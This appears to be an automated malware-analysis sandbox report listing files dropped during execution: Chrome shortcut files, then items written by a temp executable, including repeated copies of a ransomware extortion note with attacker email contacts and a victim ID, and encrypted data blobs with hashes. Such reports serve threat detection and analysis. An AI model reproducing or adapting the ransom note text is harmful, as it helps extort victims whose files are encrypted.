                                                                                                                                            Preview:L..................F.@.. ...$+.,.....y...Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.6....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.6....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.6....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.6.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.6...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2689
                                                                                                                                            Entropy (8bit):4.004164647128805
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:87dBTcVHNidAKZdA1404eh7sFiZUkmgqeh7sBy+BX:8foxIn/y
                                                                                                                                            MD5:CFA4808DE1920615CB0B33F67EF8E715
                                                                                                                                            SHA1:3911BA9F1E60841FDFE88246274AAFE213620841
                                                                                                                                            SHA-256:30F98EF8DDDFD8DD2B1E806969D31E2824602569517A7E87599F760A9B8E9731
                                                                                                                                            SHA-512:294C1E3F7595384F0EC80CBFBF343474D6647FDBE4C2103B74C20032E46A77A186810D7370C07D420DA82E78D7D95BC1FC0B1F83D443AECFC1F7EF26C21169CB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.@.. ...$+.,.....<}.i.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.6....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.6....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.6....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.6.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.F...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 05:52:26 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2677
                                                                                                                                            Entropy (8bit):3.99416206269889
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8z6dBTcwHNidAKZdA1p4ehDiZUkwqehny+R:88oQ5py
                                                                                                                                            MD5:1F5D94C392899439ED0013842CA86D6C
                                                                                                                                            SHA1:20B3F29232B94A1442C935ED4B417702D3A7B81D
                                                                                                                                            SHA-256:C669B106E05417A9A461D2D1E7B3CA19AC05E466AAB476AF3168D4293C1C6847
                                                                                                                                            SHA-512:EC9593DA34EF0332CBDAE036A903C2975F871EFEEE228ABF720479664420BD89FA77258B204E4F2036A3B7BE8C192341F1977920BB15878DAAD08A3FC3054087
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.@.. ...$+.,.........Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.6....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.6....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.6....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.6.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.6...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 05:52:26 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2677
                                                                                                                                            Entropy (8bit):3.981089985055063
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8BdBTcwHNidAKZdA1X4ehBiZUk1W1qehVy+C:8Vo+b91y
                                                                                                                                            MD5:030EDFE6CF6FC60D13C1CC5F959C028B
                                                                                                                                            SHA1:0E5C1EE2238A8447F91A5E71B2AA78C427878269
                                                                                                                                            SHA-256:A21C880C9AB167492B09D9CF8B48F899FF092C9524C813B8C83BCB1E697130E4
                                                                                                                                            SHA-512:BB992916AA12E21A6922FA125ABF21266991CED21047F2ECADBC1A89701DFA1AD06E00A52893D3037D29AB060C0171DB3D48E4CB2F43BFA99C4B68636F721C0B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.@.. ...$+.,....kC...Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.6....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.6....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.6....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.6.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.6...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 05:52:26 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2679
                                                                                                                                            Entropy (8bit):3.99380186860305
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8ndBTcwHNidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTb/y+yT+:8bojTcJTbxWOvTb/y7T
                                                                                                                                            MD5:82FC380873C595ECA5D3FF9BE44D0C54
                                                                                                                                            SHA1:CFA3CBE84D355882796797D3C12BC2B76A8712C6
                                                                                                                                            SHA-256:BF00FE8EF35DDEB0D3AD3E9412257230EF03CF8A2040341E23974084BCA49E25
                                                                                                                                            SHA-512:25B08ECA51B4D18C03983D17B3A4FC0DF5F36623ADBA895D4B38D94AA60B42B18738B3874609DCB7D37E4EA0A0B1D817F2D7258DE303EDA3B201AB9945D6D22F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.@.. ...$+.,.....Y...Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.6....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.6....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.6....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.6.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.6...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):436
                                                                                                                                            Entropy (8bit):7.4376017149818345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:2Jhsrgg3Oz+7fu3wVnYLe+Qdj1HOnwXsdmn:Ahe+z+7fAwuL321HOnU8m
                                                                                                                                            MD5:037A3926CDFEDECA5BAD6B3F927F4985
                                                                                                                                            SHA1:625334E6C6AFDEECE8D9111ED712468E32B8A6FA
                                                                                                                                            SHA-256:2EC592D6EC0E6B98D3275CB5A3837CD56A80DC3B55BF58B896D791A884D04C80
                                                                                                                                            SHA-512:70B4C2A0491162CE08B6684E147C24A5C8B7DEF33665C52E0F904254834D90913E17D8C5FDB744BAC96F69DD337A949AD47391DBB80372C5AB900FF1C459D5A8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...zZ...t6{..7TX#.(~.lE.....zM .HF.g"...Si..t...._.$.}.d.=A.E.o...%Q....>.H7.p..,..$.w....g.o...F..N.Vc;ToOH.......9...%...".m._.d~y>.... ...Q..._3..6S@8.1.1.....Ax....s..2..0.A.T......N.N..T...<....F...D..G.t..C.$......<y.2}.H;.jet.xS.Yi~S-....*.O.'{..: ...*....C.P7....De.Oi+..w8..3S..ZT.Y.fG.*.p7.d....xfF./Rd.>T../......"...j.X.\.qB..A....!...y.......Qu.G.|4..Iv..2...h6.c4....iQ;V.1.K....<.....t.xNM0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):436
                                                                                                                                            Entropy (8bit):7.4376017149818345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:2Jhsrgg3Oz+7fu3wVnYLe+Qdj1HOnwXsdmn:Ahe+z+7fAwuL321HOnU8m
                                                                                                                                            MD5:037A3926CDFEDECA5BAD6B3F927F4985
                                                                                                                                            SHA1:625334E6C6AFDEECE8D9111ED712468E32B8A6FA
                                                                                                                                            SHA-256:2EC592D6EC0E6B98D3275CB5A3837CD56A80DC3B55BF58B896D791A884D04C80
                                                                                                                                            SHA-512:70B4C2A0491162CE08B6684E147C24A5C8B7DEF33665C52E0F904254834D90913E17D8C5FDB744BAC96F69DD337A949AD47391DBB80372C5AB900FF1C459D5A8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...zZ...t6{..7TX#.(~.lE.....zM .HF.g"...Si..t...._.$.}.d.=A.E.o...%Q....>.H7.p..,..$.w....g.o...F..N.Vc;ToOH.......9...%...".m._.d~y>.... ...Q..._3..6S@8.1.1.....Ax....s..2..0.A.T......N.N..T...<....F...D..G.t..C.$......<y.2}.H;.jet.xS.Yi~S-....*.O.'{..: ...*....C.P7....De.Oi+..w8..3S..ZT.Y.fG.*.p7.d....xfF./Rd.>T../......"...j.X.\.qB..A....!...y.......Qu.G.|4..Iv..2...h6.c4....iQ;V.1.K....<.....t.xNM0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1200
                                                                                                                                            Entropy (8bit):7.8529183040444375
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:puXePHilnchz8lE6CkR/99X46eDKWJQwJ69vjS6dq9GJWpZLFn5kz:BfEno4rlRHo6/XfGKqcwD8z
                                                                                                                                            MD5:10EC7136633F8B5512B3FF650DCF4FAC
                                                                                                                                            SHA1:776245F970043316A84C27C2D46CB789FF25ED1D
                                                                                                                                            SHA-256:51FDDCC3BA53E0747C6C4D663C7DA12E05EB06AD2F19E6DBFC64FF5BC50BC0E5
                                                                                                                                            SHA-512:3EF52E703796E3CC509AB63C5A9FB8ABE056D01E19B4C0FA48A011906CC20C4E7BEE9094C5E3BBF234DC73E4142458D4F1FE2418D557170DB7D5A7CA9249DE58
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Z...O....*...../i..F..:...........G.E#....Z...6l8.x.8'.H.-..UM.m1....c.;.YK../.Gw.W..D$.u..@1...K.9..........@(Et..;.....T....p..K9.....{%.X;a.z..C.f..C...G......y~..9..gR...^!#.z..(..J..>.......^....|..9pn..yz.=D......4...[.n..C}..mKs...9Hg...9.~m....../...q.nZ[....F.o1..H0...\.V..2........._..*L...}.....:R.L..e.....,~L.9Xd. .J{J.#S.0.*..V.3_.D3..+.........._..?8.L.+.7..O.t.1...g...%F....V.2|.'....v...2.IfX.1.#..:..=tR..Z.....J...#......=1.?...Zt\.X...>GK..!..yp.Y.H....2w.Q_l&.h..w...eYa.:...}.v.B>....lj.=......+.wzh.F..<.}...#z...D8.:.:......C.fW.n.....).m...D.8P{h....L6..d*.YW...A.'..^aKeZ.D./3......`4P.o...lW;..8.. RU.I}_...].,,.~$s"....! '..."...60MjYJQ....,r..,...K.1T|.lx.pr...}....AX...i.b..,Ol.,....f....V:)......xVr. .,u3P.H....WP8...F..US7.W._h....E#'..K./.Y.7.....l......n...]x.=..N5...k.f..N..@,..N.F0..Y...8..j........H+..L.B~$.R.M....+..e..7..'I.....B...2........;....9.|...i18.k.=.?. o..V.)f].S....HN_<..2.D}.y}....Q.B..l.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1200
                                                                                                                                            Entropy (8bit):7.8529183040444375
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:puXePHilnchz8lE6CkR/99X46eDKWJQwJ69vjS6dq9GJWpZLFn5kz:BfEno4rlRHo6/XfGKqcwD8z
                                                                                                                                            MD5:10EC7136633F8B5512B3FF650DCF4FAC
                                                                                                                                            SHA1:776245F970043316A84C27C2D46CB789FF25ED1D
                                                                                                                                            SHA-256:51FDDCC3BA53E0747C6C4D663C7DA12E05EB06AD2F19E6DBFC64FF5BC50BC0E5
                                                                                                                                            SHA-512:3EF52E703796E3CC509AB63C5A9FB8ABE056D01E19B4C0FA48A011906CC20C4E7BEE9094C5E3BBF234DC73E4142458D4F1FE2418D557170DB7D5A7CA9249DE58
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Z...O....*...../i..F..:...........G.E#....Z...6l8.x.8'.H.-..UM.m1....c.;.YK../.Gw.W..D$.u..@1...K.9..........@(Et..;.....T....p..K9.....{%.X;a.z..C.f..C...G......y~..9..gR...^!#.z..(..J..>.......^....|..9pn..yz.=D......4...[.n..C}..mKs...9Hg...9.~m....../...q.nZ[....F.o1..H0...\.V..2........._..*L...}.....:R.L..e.....,~L.9Xd. .J{J.#S.0.*..V.3_.D3..+.........._..?8.L.+.7..O.t.1...g...%F....V.2|.'....v...2.IfX.1.#..:..=tR..Z.....J...#......=1.?...Zt\.X...>GK..!..yp.Y.H....2w.Q_l&.h..w...eYa.:...}.v.B>....lj.=......+.wzh.F..<.}...#z...D8.:.:......C.fW.n.....).m...D.8P{h....L6..d*.YW...A.'..^aKeZ.D./3......`4P.o...lW;..8.. RU.I}_...].,,.~$s"....! '..."...60MjYJQ....,r..,...K.1T|.lx.pr...}....AX...i.b..,Ol.,....f....V:)......xVr. .,u3P.H....WP8...F..US7.W._h....E#'..K./.Y.7.....l......n...]x.=..N5...k.f..N..@,..N.F0..Y...8..j........H+..L.B~$.R.M....+..e..7..'I.....B...2........;....9.|...i18.k.=.?. o..V.)f].S....HN_<..2.D}.y}....Q.B..l.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67975
